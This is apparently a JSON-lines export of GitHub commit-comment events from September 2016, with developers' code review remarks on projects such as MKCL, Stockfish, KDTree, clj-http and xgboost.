{"id":"4567768330","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035265,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:26:54Z","updated_at":"2016-09-15T12:26:54Z","body":"What was the symptom that made you say that the dependency was missing (exact message if possible)?\r\n\r\nThere may be some transition issues between makefiles content that I have not quite figured out.\r\nThe fact that makefiles are produced by \"configure\" in MKCL has always been a source of trouble...\r\n"}},"created_at":"2016-09-15T12:26:54Z"}
{"id":"4567769209","type":"CommitCommentEvent","actor":{"login":"daniel-k"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19035268,"position":45,"line":45,"path":"hermit/arch/x86/kernel/syscall.c","commit_id":"00dd4b0a2a4b7aeb45343b03341e50dedc0cf061","created_at":"2016-09-15T12:27:06Z","updated_at":"2016-09-15T12:27:06Z","body":"Arithmetic on `void*` [is illegal in C](http://stackoverflow.com/questions/3523145/pointer-arithmetic-for-void-pointer-in-c) and only a GCC extension. Shouldn't we keep the code as standard-compliant as possible? Maybe moving to Clang might be interesting in the future? However, Clang supports this particular extension for compatibility reasons."}},"created_at":"2016-09-15T12:27:06Z"}
{"id":"4567770791","type":"CommitCommentEvent","actor":{"login":"PetronellaSimonsbacka"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19035273,"position":null,"line":null,"path":null,"commit_id":"182d4bacb834b419c79e24d8d42e71116efea63d","created_at":"2016-09-15T12:27:26Z","updated_at":"2016-09-15T12:27:26Z","body":"Thank you!"}},"created_at":"2016-09-15T12:27:26Z"}
{"id":"4567772242","type":"CommitCommentEvent","actor":{"login":"PetronellaSimonsbacka"},"repo":{"name":"PetronellaSimonsbacka/practice_challenges"},"payload":{"comment":{"id":19035280,"position":26,"line":25,"path":"challenge_6/App/lib/lib.my_app.rb","commit_id":"182d4bacb834b419c79e24d8d42e71116efea63d","created_at":"2016-09-15T12:27:44Z","updated_at":"2016-09-15T12:27:44Z","body":"Thank you!\r\n"}},"created_at":"2016-09-15T12:27:44Z"}
{"id":"4567773118","type":"CommitCommentEvent","actor":{"login":"KkambizZ"},"repo":{"name":"RM-HS-Team1-CFT55/rmhst1_connect4_core"},"payload":{"comment":{"id":19035285,"position":null,"line":null,"path":null,"commit_id":"6e862129e670031e27c9f361192b688657f98831","created_at":"2016-09-15T12:27:56Z","updated_at":"2016-09-15T12:27:56Z","body":"The initialization of this class was done by Arti and Kambiz"}},"created_at":"2016-09-15T12:27:56Z"}
{"id":"4567776936","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035291,"position":49,"line":49,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:28:45Z","updated_at":"2016-09-15T12:28:45Z","body":"Indeed (yes)."}},"created_at":"2016-09-15T12:28:45Z"}
{"id":"4567777780","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/imgur-uploader"},"payload":{"comment":{"id":19035295,"position":13,"line":12,"path":"index.js","commit_id":"eac2f0a535f504a169d04dfe49f0a5367cb9a4a4","created_at":"2016-09-15T12:28:56Z","updated_at":"2016-09-15T12:28:56Z","body":"Maybe try converting to ArrayBuffer and set the correct type: https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Sending_and_Receiving_Binary_Data\r\n\r\nWould be a lot more efficient than base64"}},"created_at":"2016-09-15T12:28:56Z"}
{"id":"4567778344","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035297,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:29:04Z","updated_at":"2016-09-15T12:29:04Z","body":"Well, you add a new target `lsp/git_describe.lsp` to src/Makefile.in, yet nothing uses (=depends on) that target, no? So it's just never built. Log coming up in a few minutes."}},"created_at":"2016-09-15T12:29:04Z"}
{"id":"4567778365","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19035298,"position":null,"line":null,"path":null,"commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T12:29:04Z","updated_at":"2016-09-15T12:29:04Z","body":":-1:"}},"created_at":"2016-09-15T12:29:04Z"}
{"id":"4567780682","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035303,"position":39,"line":39,"path":"KD3DTree/struct_file.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:29:35Z","updated_at":"2016-09-15T12:29:35Z","body":"Oh, boy =) Any reason not to use standard functions for fs I/O? "}},"created_at":"2016-09-15T12:29:35Z"}
{"id":"4567780834","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19035304,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-15T12:29:37Z","updated_at":"2016-09-15T12:29:37Z","body":"That's strange. Can I know which web server did you use? (I assume that you're using UPUPW)"}},"created_at":"2016-09-15T12:29:37Z"}
{"id":"4567781210","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035305,"position":72,"line":72,"path":"KD3DTree/struct_file.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:29:42Z","updated_at":"2016-09-15T12:29:42Z","body":"=)"}},"created_at":"2016-09-15T12:29:42Z"}
{"id":"4567781808","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035310,"position":84,"line":84,"path":"KD3DTree/struct_file.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:29:50Z","updated_at":"2016-09-15T12:29:50Z","body":"=)))"}},"created_at":"2016-09-15T12:29:50Z"}
{"id":"4567783002","type":"CommitCommentEvent","actor":{"login":"asfernandes"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":19035314,"position":2,"line":1,"path":"builds/install/posix-common/posixLibrary.sh.in","commit_id":"1d2990f7e855dd64cdc0a730cb17915406d060eb","created_at":"2016-09-15T12:30:07Z","updated_at":"2016-09-15T12:30:07Z","body":"Typo here."}},"created_at":"2016-09-15T12:30:07Z"}
{"id":"4567783740","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19035316,"position":14,"line":89,"path":"tests/protractor/e2e/send-message.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T12:30:15Z","updated_at":"2016-09-15T12:30:15Z","body":"I don't think this is doing what you think it's doing. `isPresent()` and `isDisplayed()` both return promises, so it's treating `isPresent` as truthy because it's a promise and then returning `isDisplayed`, which is (presumably) then blocked on and evaluated usefully."}},"created_at":"2016-09-15T12:30:15Z"}
{"id":"4567784513","type":"CommitCommentEvent","actor":{"login":"gsenius"},"repo":{"name":"gsenius/Hello-My-new-life"},"payload":{"comment":{"id":19035322,"position":2,"line":2,"path":"README.md","commit_id":"145fa2656cfcefccf070fca661d9ec1df8853a60","created_at":"2016-09-15T12:30:23Z","updated_at":"2016-09-15T12:30:23Z","body":"`include yourself`"}},"created_at":"2016-09-15T12:30:23Z"}
{"id":"4567784594","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19035324,"position":7,"line":88,"path":"tests/protractor/e2e/send-message.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T12:30:24Z","updated_at":"2016-09-15T12:30:24Z","body":"Does this no longer work anymore? It was intentional that I was checking that it wasn't currently displayed."}},"created_at":"2016-09-15T12:30:24Z"}
{"id":"4567790667","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035338,"position":9,"line":9,"path":"KD3DTree/struct_file.cpp","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:31:42Z","updated_at":"2016-09-15T12:31:42Z","body":"what's wrong with std::string, std::vector?"}},"created_at":"2016-09-15T12:31:42Z"}
{"id":"4567790917","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035339,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:31:44Z","updated_at":"2016-09-15T12:31:44Z","body":"This is above my understanding of git.  What is it more precisely that you would replace by this snippet?"}},"created_at":"2016-09-15T12:31:44Z"}
{"id":"4567791693","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035340,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:31:55Z","updated_at":"2016-09-15T12:31:55Z","body":"This is the log: https://gist.github.com/pipping/0b9f70fe19eb533dde50ec9fe6171efc"}},"created_at":"2016-09-15T12:31:55Z"}
{"id":"4567792134","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035343,"position":21,"line":21,"path":"KD3DTree/struct_file.cpp","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:32:00Z","updated_at":"2016-09-15T12:32:00Z","body":"Yup =)"}},"created_at":"2016-09-15T12:32:00Z"}
{"id":"4567792400","type":"CommitCommentEvent","actor":{"login":"Wruczek"},"repo":{"name":"Wruczek/githubfun"},"payload":{"comment":{"id":19035344,"position":1,"line":1,"path":"kappa.md","commit_id":"2af5ba69748c19cc37b6b9b8e22ab65f17f5ba5f","created_at":"2016-09-15T12:32:04Z","updated_at":"2016-09-15T12:32:04Z","body":"saadsadasasdads\r\nsdaasdads\r\nasd\r\n\r\nasd\r\nasdasdadsasdsdsdadssssss"}},"created_at":"2016-09-15T12:32:04Z"}
{"id":"4567792536","type":"CommitCommentEvent","actor":{"login":"gsenius"},"repo":{"name":"gsenius/Hello-My-new-life"},"payload":{"comment":{"id":19035345,"position":null,"line":null,"path":null,"commit_id":"145fa2656cfcefccf070fca661d9ec1df8853a60","created_at":"2016-09-15T12:32:06Z","updated_at":"2016-09-15T12:32:06Z","body":"Today , i built a new project!\r\n\r\n![Uploading Amy-Acker-3.jp\r\n![Uploading Amy-Acker-3.jpg…]()\r\n\r\ng…]()\r\n"}},"created_at":"2016-09-15T12:32:06Z"}
{"id":"4567792563","type":"CommitCommentEvent","actor":{"login":"Wruczek"},"repo":{"name":"Wruczek/githubfun"},"payload":{"comment":{"id":19035346,"position":1,"line":1,"path":"kappa.md","commit_id":"2af5ba69748c19cc37b6b9b8e22ab65f17f5ba5f","created_at":"2016-09-15T12:32:07Z","updated_at":"2016-09-15T12:32:07Z","body":"dassdsda"}},"created_at":"2016-09-15T12:32:07Z"}
{"id":"4567795981","type":"CommitCommentEvent","actor":{"login":"petro-rudenko"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19035357,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T12:32:50Z","updated_at":"2016-09-15T12:32:50Z","body":"Why not extend `ProbabilisticClassificationModel` to produce probability? Since in any case xgboost returns probability possible to do something like this:\r\n```scala\r\nval predictResults = rowPredictResults.map(prediction => Row(probability2prediction(prediction), prediction).iterator```"}},"created_at":"2016-09-15T12:32:50Z"}
{"id":"4567800411","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19035364,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-15T12:33:45Z","updated_at":"2016-09-15T12:33:45Z","body":"I admit I rarely use the map feature, but I do use the hourly on occasion, instead of a full removal, couldn't it simply check \"is empty\" as to show it or not? "}},"created_at":"2016-09-15T12:33:45Z"}
{"id":"4567801034","type":"CommitCommentEvent","actor":{"login":"Tarik02"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19035365,"position":null,"line":null,"path":null,"commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T12:33:53Z","updated_at":"2016-09-15T12:33:53Z","body":"@thebigsmileXD, why?"}},"created_at":"2016-09-15T12:33:53Z"}
{"id":"4567801181","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035367,"position":5,"line":5,"path":"KD3DTree/struct_file.cpp","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:33:55Z","updated_at":"2016-09-15T12:33:55Z","body":"[std::getline](http://en.cppreference.com/w/cpp/string/basic_string/getline)"}},"created_at":"2016-09-15T12:33:55Z"}
{"id":"4567804073","type":"CommitCommentEvent","actor":{"login":"svcarlsen"},"repo":{"name":"netarchivesuite/netarchivesuite"},"payload":{"comment":{"id":19035379,"position":null,"line":null,"path":null,"commit_id":"8ac49377b50941c99bafcbd326d50397aa9eb9d8","created_at":"2016-09-15T12:34:30Z","updated_at":"2016-09-15T12:34:30Z","body":"The HarvestControllerServer is non intended to have access to the database, so why do you want to do this?"}},"created_at":"2016-09-15T12:34:30Z"}
{"id":"4567808424","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19035386,"position":null,"line":null,"path":null,"commit_id":"3ac9c677bca0b4a8675e0af513f5a2272fda8603","created_at":"2016-09-15T12:35:25Z","updated_at":"2016-09-15T12:35:25Z","body":"TEST: Do MrMC properly buffer when both audio & video Q are empty?\r\nTriggering a sync when Q is empty gives judder, no re-buffering. But it's on vanilla 16, of course..."}},"created_at":"2016-09-15T12:35:25Z"}
{"id":"4567808956","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19035387,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T12:35:31Z","updated_at":"2016-09-15T12:35:31Z","body":"Sounds good.\n\n\nOn Thu, Sep 15, 2016 at 1:54 PM, pb00068 <notifications@github.com> wrote:\n\n> @mcostalba <https://github.com/mcostalba> Running a normal bench I\n> measure that there are snipers in 20% of cases.\n> In case of snipers !=0 the mean-value is 1.03 so I suggest to move the\n> *defensive* assignment into the loop of snipers.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mcostalba/Stockfish/commit/ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87#commitcomment-19034851>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGAZp4AqOB7w-6oqgA-EkPy47XHiKnks5qqTHzgaJpZM4J6qB8>\n> .\n>\n"}},"created_at":"2016-09-15T12:35:31Z"}
{"id":"4567809875","type":"CommitCommentEvent","actor":{"login":"joelittlejohn"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19035389,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-15T12:35:45Z","updated_at":"2016-09-15T12:35:45Z","body":"I do like @clyfe's suggestion but given what @joegallo says I guess that means we'll have to support this in a more mundane way - an option in the options map.  \r\n\r\nAnyone have any strong options about what this option should be called? How about the following:\r\n\r\n```clj\r\n;; for field[0]=a&field[1]=b&field[2]=c\r\n(http/get \"http://example.com\" {:query-params {:field [\"a\" \"b\" \"c\"])}\r\n                                :multi-query-params :indexed})\r\n\r\n;; for field[]=a&field[]=b&field[]=c\r\n(http/get \"http://example.com\" {:query-params {:field [\"a\" \"b\" \"c\"])}\r\n                                :multi-query-params :array})\r\n\r\n;; for field=a&field=b&field=c\r\n(http/get \"http://example.com\" {:query-params {:field [\"a\" \"b\" \"c\"])}})\r\n```\r\n\r\nI'm happy to implement."}},"created_at":"2016-09-15T12:35:45Z"}
{"id":"4567813894","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":19035396,"position":20,"line":20,"path":"phonebook_with_api.py","commit_id":"bdd6e1710c63106b64a42f62b2a3ff82782db77f","created_at":"2016-09-15T12:36:36Z","updated_at":"2016-09-15T12:36:36Z","body":"Если это делается для валидации - это слишком избыточно. Проще прочитать одну строку проверить, чем считывать весь файл и конвертировать в список"}},"created_at":"2016-09-15T12:36:36Z"}
{"id":"4567816197","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035407,"position":4,"line":4,"path":"KD3DTree/struct_item.cpp","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:37:06Z","updated_at":"2016-09-15T12:37:06Z","body":"Is it really a good idea to make this a member function (instead of regular one)?"}},"created_at":"2016-09-15T12:37:06Z"}
{"id":"4567819326","type":"CommitCommentEvent","actor":{"login":"gsenius"},"repo":{"name":"gsenius/Hello-My-new-life"},"payload":{"comment":{"id":19035413,"position":2,"line":2,"path":"README.md","commit_id":"145fa2656cfcefccf070fca661d9ec1df8853a60","created_at":"2016-09-15T12:37:47Z","updated_at":"2016-09-15T12:37:47Z","body":"+amay\r\n"}},"created_at":"2016-09-15T12:37:47Z"}
{"id":"4567821969","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035420,"position":10,"line":10,"path":"KD3DTree/struct_item.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:38:19Z","updated_at":"2016-09-15T12:38:19Z","body":"Wtf?! =) I don't see a single reason for this to exist "}},"created_at":"2016-09-15T12:38:19Z"}
{"id":"4567823566","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035424,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:38:39Z","updated_at":"2016-09-15T12:38:39Z","body":"Well, what the above lines (27-33) do is turn the current revision into the name of a branch and falling back to the string \"HEAD\" if we're not on a branch. The way that this is done is rather nasty because the script explicitly looks at .git/HEAD. There's a perfectly good tool for that job, and that's `git rev-parse`: `git rev-parse --abbrev-ref HEAD` will return the name of the branch we're on if there is one and leave the \"HEAD\" untranslated otherwise. For all cases I can think of, that's equivalent to the above code yet far less hackish."}},"created_at":"2016-09-15T12:38:39Z"}
{"id":"4567824715","type":"CommitCommentEvent","actor":{"login":"AustinSaintAubin"},"repo":{"name":"cleanflight/cleanflight"},"payload":{"comment":{"id":19035426,"position":null,"line":null,"path":null,"commit_id":"af503135c3e4c7e9793876edd5641f850ff00261","created_at":"2016-09-15T12:38:53Z","updated_at":"2016-09-15T12:38:53Z","body":"Is it more efficient to use a return statement at the beginning of the function?\r\nWould the following format be more logical?\r\nJust want to understand so I can write more acceptable code.\r\n\r\nFunction {\r\n\tIf (condition) {\r\n\t\t// All the code that does stuff...\r\n\t\tmath=1+1\r\n\r\n\t\treturn 1\r\n\t}\r\n\telse {\r\n\t\treturn 0\r\n\t}\r\n}\r\n"}},"created_at":"2016-09-15T12:38:53Z"}
{"id":"4567826982","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":19035430,"position":41,"line":41,"path":"phonebook_with_api.py","commit_id":"bdd6e1710c63106b64a42f62b2a3ff82782db77f","created_at":"2016-09-15T12:39:22Z","updated_at":"2016-09-15T12:39:22Z","body":"лучше использовать with"}},"created_at":"2016-09-15T12:39:22Z"}
{"id":"4567827924","type":"CommitCommentEvent","actor":{"login":"dshanske"},"repo":{"name":"indieweb/wordpress-indieweb"},"payload":{"comment":{"id":19035431,"position":7,"line":5,"path":"includes/getting-started.php","commit_id":"fd384d3d07dd7d8f2a2525b9e01d31aeb352dc98","created_at":"2016-09-15T12:39:33Z","updated_at":"2016-09-15T12:39:33Z","body":"WordPress in 4.6 changes the priority so the translation packs from wordpress.org. So it will use the translations from https://translate.wordpress.org/projects/wp-plugins/indieweb first. Here is a blog post on it(https://make.wordpress.org/core/2016/07/06/i18n-improvements-in-4-6/). \r\n\r\nWith that in mind, it means you can't always verify where translations might be coming from."}},"created_at":"2016-09-15T12:39:33Z"}
{"id":"4567830703","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19035439,"position":null,"line":null,"path":null,"commit_id":"1599bc22511ac35159b9745be148de1e820a865b","created_at":"2016-09-15T12:40:09Z","updated_at":"2016-09-15T12:40:09Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 33](http://munit-050:8112/tc/viewLog.html?buildId=99049&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T12:40:09Z"}
{"id":"4567830781","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19035440,"position":4,"line":79,"path":"src/main/java/com/blockout/controls/Button.java","commit_id":"02ce894b8f6f25ebac9abfbcc20f656c4c8db56e","created_at":"2016-09-15T12:40:10Z","updated_at":"2016-09-15T12:40:10Z","body":"How did this compiled before? :O"}},"created_at":"2016-09-15T12:40:10Z"}
{"id":"4567830792","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035441,"position":null,"line":null,"path":null,"commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:40:10Z","updated_at":"2016-09-15T12:40:10Z","body":"So much for relying on wildcard expansion in prerequisites! I was naively hoping that the rule producing bin/mkcl-small$(EXE) would cover the case and it is not.\r\nThis indeed fails when there is no pre-existing lsp/git_describe.lsp.\r\nI'll fix it soon. Thank you for finding it."}},"created_at":"2016-09-15T12:40:10Z"}
{"id":"4567831905","type":"CommitCommentEvent","actor":{"login":"agampandey"},"repo":{"name":"agampandey/datasharing"},"payload":{"comment":{"id":19035445,"position":null,"line":null,"path":null,"commit_id":"c179250410139c62c1af03fafa4916822de8b30a","created_at":"2016-09-15T12:40:24Z","updated_at":"2016-09-15T12:40:24Z","body":"added datasharing for course assignment"}},"created_at":"2016-09-15T12:40:24Z"}
{"id":"4567832267","type":"CommitCommentEvent","actor":{"login":"ayonstein"},"repo":{"name":"ayonstein/TicTacToe-python-"},"payload":{"comment":{"id":19035450,"position":48,"line":48,"path":"tictactoe.py","commit_id":"660af5f02a6b59018b810c032fd8d1de9db0afac","created_at":"2016-09-15T12:40:29Z","updated_at":"2016-09-15T12:40:29Z","body":"comment added"}},"created_at":"2016-09-15T12:40:29Z"}
{"id":"4567836901","type":"CommitCommentEvent","actor":{"login":"jceel"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19035459,"position":20,"line":61,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"154f9156a678fc1b0c29046b3afbbdb322d379a1","created_at":"2016-09-15T12:41:25Z","updated_at":"2016-09-15T12:41:25Z","body":"why select() for just one fd? also, why timeout?"}},"created_at":"2016-09-15T12:41:25Z"}
{"id":"4567836934","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":19035460,"position":87,"line":87,"path":"phonebook_with_api.py","commit_id":"bdd6e1710c63106b64a42f62b2a3ff82782db77f","created_at":"2016-09-15T12:41:25Z","updated_at":"2016-09-15T12:41:25Z","body":"Ввод/вывод всегда лучше выносить в отдельную функцию"}},"created_at":"2016-09-15T12:41:25Z"}
{"id":"4567837539","type":"CommitCommentEvent","actor":{"login":"pipping"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035462,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:41:32Z","updated_at":"2016-09-15T12:41:32Z","body":"That said, if this code was indeed copied directly from SBCL, maybe I should not be commenting on it here at all because it might be easier to just keep this copy in sync with SBCL's and introduce unnecessary differences, if the sole gain is cleaner code."}},"created_at":"2016-09-15T12:41:32Z"}
{"id":"4567839344","type":"CommitCommentEvent","actor":{"login":"Kostronor"},"repo":{"name":"Minecolonies/minecolonies"},"payload":{"comment":{"id":19035467,"position":45,"line":529,"path":"src/main/java/com/minecolonies/entity/EntityCitizen.java","commit_id":"02ce894b8f6f25ebac9abfbcc20f656c4c8db56e","created_at":"2016-09-15T12:41:55Z","updated_at":"2016-09-15T12:41:55Z","body":"You sure this will never return null?  And none of its overrides parent/childs do? "}},"created_at":"2016-09-15T12:41:55Z"}
{"id":"4567839915","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":19035471,"position":100,"line":100,"path":"phonebook_with_api.py","commit_id":"bdd6e1710c63106b64a42f62b2a3ff82782db77f","created_at":"2016-09-15T12:42:02Z","updated_at":"2016-09-15T12:42:02Z","body":"'{}{}{}{}'.format(... можно заменить просто на \"\".join()"}},"created_at":"2016-09-15T12:42:02Z"}
{"id":"4567840994","type":"CommitCommentEvent","actor":{"login":"ikalnitsky"},"repo":{"name":"ikalnitsky/Kostyor"},"payload":{"comment":{"id":19035473,"position":15,"line":15,"path":"contrib/openapi.yml","commit_id":"6a62e365d76100d1d041e06196d815f0702e2327","created_at":"2016-09-15T12:42:16Z","updated_at":"2016-09-15T12:42:16Z","body":"> Shouldn't we use \"cluster\" term instead of \"Openstack Environment\" for clarity? \r\n\r\nI think it doesn't really matter since everyone knows what OpenStack environment is. But ok, I'll update for consistency. \r\n\r\n> Igor, could you please change https://github.com/sc68cal/Kostyor/blob/master/doc/source/rest_api.rst right after this doc will be finalized.\r\n\r\nI think it should be updated not only when OpenAPI spec is ready, but when changes are implemented. For instance, I'm working on #31 and it doesn't fully implement this spec. I'm waiting for approval. "}},"created_at":"2016-09-15T12:42:16Z"}
{"id":"4567843654","type":"CommitCommentEvent","actor":{"login":"denyszamiatin"},"repo":{"name":"vadimk2016/python_docs"},"payload":{"comment":{"id":19035482,"position":105,"line":105,"path":"phonebook_with_api.py","commit_id":"bdd6e1710c63106b64a42f62b2a3ff82782db77f","created_at":"2016-09-15T12:42:48Z","updated_at":"2016-09-15T12:42:48Z","body":"В функциях бизнес-логики лучше выбрасывать исключение, чем выводить в консоль"}},"created_at":"2016-09-15T12:42:48Z"}
{"id":"4567847282","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19035488,"position":17,"line":1002,"path":"src/pocketmine/Player.php","commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T12:43:33Z","updated_at":"2016-09-15T12:43:33Z","body":"This condition is redundant. Look at setFood() and you'll see why."}},"created_at":"2016-09-15T12:43:33Z"}
{"id":"4567847984","type":"CommitCommentEvent","actor":{"login":"redion1992"},"repo":{"name":"redion1992/iRacing-Arduino-Pit-Board"},"payload":{"comment":{"id":19035489,"position":null,"line":null,"path":null,"commit_id":"959eeb1a42ed2e075d81677ca0aac9b7ef0ceb4f","created_at":"2016-09-15T12:43:41Z","updated_at":"2016-09-15T12:43:41Z","body":"D'oh, not to match upstream, to avoid compiler issues referencing two copies of the code."}},"created_at":"2016-09-15T12:43:41Z"}
{"id":"4567851960","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19035500,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T12:44:28Z","updated_at":"2016-09-15T12:44:28Z","body":"Submitted [bug-fix-test](http://tests.stockfishchess.org/tests/view/57da97740ebc59030fbe535a)"}},"created_at":"2016-09-15T12:44:28Z"}
{"id":"4567852408","type":"CommitCommentEvent","actor":{"login":"jcbeaudoin"},"repo":{"name":"jcbeaudoin/MKCL"},"payload":{"comment":{"id":19035503,"position":33,"line":33,"path":"src/git_describe_this_mkcl.sh","commit_id":"fc50d0038f2f1579fbb7c6ae930c1d111448346e","created_at":"2016-09-15T12:44:35Z","updated_at":"2016-09-15T12:44:35Z","body":"Effectively this is code that comes directly from the original SBCL script without any modifications of mine."}},"created_at":"2016-09-15T12:44:35Z"}
